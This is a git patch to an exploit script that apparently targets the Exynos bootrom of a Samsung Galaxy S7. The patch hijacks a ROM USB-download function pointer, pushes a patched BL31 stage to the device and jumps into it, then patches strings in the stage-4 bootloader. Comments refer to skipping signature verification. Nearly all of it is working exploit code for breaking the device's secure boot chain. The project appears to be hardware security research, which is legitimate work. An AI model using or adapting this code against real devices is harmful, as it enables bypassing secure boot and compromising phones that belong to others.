From 2c20ff6255216684c2b03a9d8ac3b47868870658 Mon Sep 17 00:00:00 2001 From: Eljakim Herrewijnen Date: Sun, 18 Aug 2024 13:55:11 +0200 Subject: [PATCH] Boots a patched bl31 --- source/exploit/exploit.py | 61 ++++++++++++++++++++++++++------------- 1 file changed, 41 insertions(+), 20 deletions(-) diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 327374f..133b76f 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -623,36 +623,47 @@ class ExynosDevice(): # INSERT YOUR BL1 PATCHES HERE self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31 + self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br")) + + # self.cd.memwrite_region(0x020200a0, p32(DEBUGGER_ADDR)) + # self.cd.memwrite_region(0x020200d0, p32(DEBUGGER_ADDR)) + # self.cd.memwrite_region(0x020200b4, p32(DEBUGGER_ADDR)) + # self.cd.memwrite_region(0x020200a4, p32(DEBUGGER_ADDR)) + + # self.cd.memwrite_region(0x0202297c, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) + + + GADGET_RET0 = 0x00000d58 + # self.cd.memwrite_region(0x20296da , p32(GADGET_RET0)) + # self.cd.memwrite_region(0x20296da + 4, p32(GADGET_RET0)) + # END jump_bl1(DEBUGGER_ADDR) # ==== BL31 ==== assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - - self.cd.memwrite_region(self.cd.arch_dbg.state.X0, open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) - - + + # Download next stage via ROM_DOWNLOAD_USB lr = self.cd.arch_dbg.state.LR self.cd.arch_dbg.state.LR = DEBUGGER_ADDR self.cd.restore_stack_and_jump(hijacked_fun) # will jump back to debugger after downloading the next stage time.sleep(2) self.connect_device() - - - - self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()[:0x10]) + self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()) time.sleep(2) self.usb_read(0x200) # GiAs # lr = self.cd.arch_dbg.state.LR - self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) - GADGET_RET0 = 0x00000d58 - self.cd.memwrite_region(0x020200e4, p32(GADGET_RET0)) + self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow + + # TODO patch verification + + + # self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0)) + + - # ====== PATCHES TO BL31 here! ====== - # TODO fix not checking signatures - # self.cd.memwrite_region(0x02031008, b"ELH") # self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR # self.cd.arch_dbg.state.X0 = 0x020347f0 @@ -660,6 +671,16 @@ class ExynosDevice(): # self.cd.restore_stack_and_jump(0x02030464) self.cd.restore_stack_and_jump(lr) + time.sleep(2) + self.usb_read(0x200) # GiAs + self.cd.memwrite_region(0x02031008, b"ELH") + # ====== PATCHES TO BL31 here! ====== + + + # Jump BL31 + self.cd.restore_stack_and_jump(0x02024010) + + time.sleep(2) self.connect_device() @@ -676,12 +697,12 @@ class ExynosDevice(): # ==== Stage 4 ==== stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() # Patching - # stage4_len = len(stage4) - # patch_len = len(b"USB RECOVERY MODE") - # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE"))) - # patch_offset = stage4.find(b"USB RECOVERY MODE") - # stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:] - # assert len(stage4) == stage4_len, "Invalid stage4 length" + stage4_len = len(stage4) + patch_len = len(b"USB RECOVERY MODE") + patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE"))) + patch_offset = stage4.find(b"USB RECOVERY MODE") + stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:] + assert len(stage4) == stage4_len, "Invalid stage4 length" self.send_normal_stage(stage4) time.sleep(2)